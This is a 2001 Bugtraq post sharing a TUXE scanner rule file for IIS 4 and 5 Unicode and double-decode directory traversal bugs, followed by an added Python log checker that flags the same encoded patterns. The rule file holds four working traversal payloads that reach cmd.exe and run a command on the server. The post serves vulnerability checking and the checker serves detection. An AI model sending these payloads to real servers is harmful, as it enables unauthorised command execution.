[20660] in bugtraq
RE: Microsoft IIS CGI Filename Decode Error Vulnerability
daemon@ATHENA.MIT.EDU (d0gman !)
Wed May 16 08:47:15 2001
From: "d0gman !" <d0gman@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 15 May 2001 11:27:39 -0000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_641a_5019_3d02"
Message-ID: <F185nZYe6CdWxLhCIRt00004e20@hotmail.com>
This is a multi-part message in MIME format.
------=_NextPart_000_641a_5019_3d02
Content-Type: text/plain; format=flowed
The attached UXE file, for use with TWWSCAN/TUXE Expert Scanner (available
from: http://search.iland.co.kr) will scan IIS 4 and 5 servers for the old
Unicode vulnerability and the new Filename Decode Error vulnerability.
Usage: tuxe target_server port iisuc.uxe
Cheers
d0gman
------=_NextPart_000_641a_5019_3d02
Content-Type: text/plain; name="iisuc.uxe"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="iisuc.uxe"
#############################################################################
#
# IIS 4 & 5 Unicode Checks
#
# Checks for old %C1%9C / %C1%1C / %C0%AF bug
# Checks for new %252f CGI encoding unicode bug.
#
# Rule by d0gman
#
# Usage: tuxe target port iisuc.uxe
#
#############################################################################
200 OK-> HEAD: /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 1;
200 OK-> HEAD: /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 2;
200 OK-> HEAD: /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\^Old Unicode Check 3;
200 OK-> HEAD: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\^New Unicode check;
------=_NextPart_000_641a_5019_3d02--
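The defender's view of the same four request forms, as an added example that is not part of the original post or of TUXE: a log check that decodes each request target once and twice and flags the overlong and double-encoded traversal patterns the rule file looks for. The four-field log layout, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# ".." followed by a path separator, or by a 0xC0/0xC1 lead byte. Those two
# bytes never occur in valid UTF-8, so after one decode they mark the
# overlong forms listed in the rule file (%C0%AF, %C1%1C, %C1%9C).
TRAVERSAL = re.compile(rb"\.\.[/\\]")
OVERLONG = re.compile(rb"\.\.[\xc0\xc1]")

def classify(raw_target):
    """Return the findings for one raw, still-encoded request target."""
    path = raw_target.split("?", 1)[0]
    once = unquote_to_bytes(path)
    twice = unquote_to_bytes(once)
    findings = []
    if OVERLONG.search(once):
        findings.append("overlong-utf8-traversal")
    # A separator that only appears on the second decode is the %252f case.
    if TRAVERSAL.search(twice) and not TRAVERSAL.search(once):
        findings.append("double-decode-traversal")
    return findings

def scan(lines):
    """Yield (client, target, findings, served) for each suspicious line.

    Assumed line layout (constructed for this example, not an IIS format):
    client method raw-target status
    """
    for line in lines:
        client, _method, target, status = line.split()
        findings = classify(target)
        if findings:
            # The rule file treats "200 OK" as a hit; the same status in a
            # log means the request was served and needs follow-up.
            yield client, target, findings, status == "200"

# Constructed sample lines (documentation addresses, shortened paths).
SAMPLE = [
    "192.0.2.10 GET /scripts/report.asp?id=7 200",
    "192.0.2.44 HEAD /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir 404",
    "192.0.2.44 HEAD /scripts/..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir 200",
    "192.0.2.51 HEAD /scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir 200",
    "192.0.2.10 GET /docs/100%25%20free.htm 200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The check needs the request target exactly as the client sent it; a log that records the already-decoded path will not show these patterns.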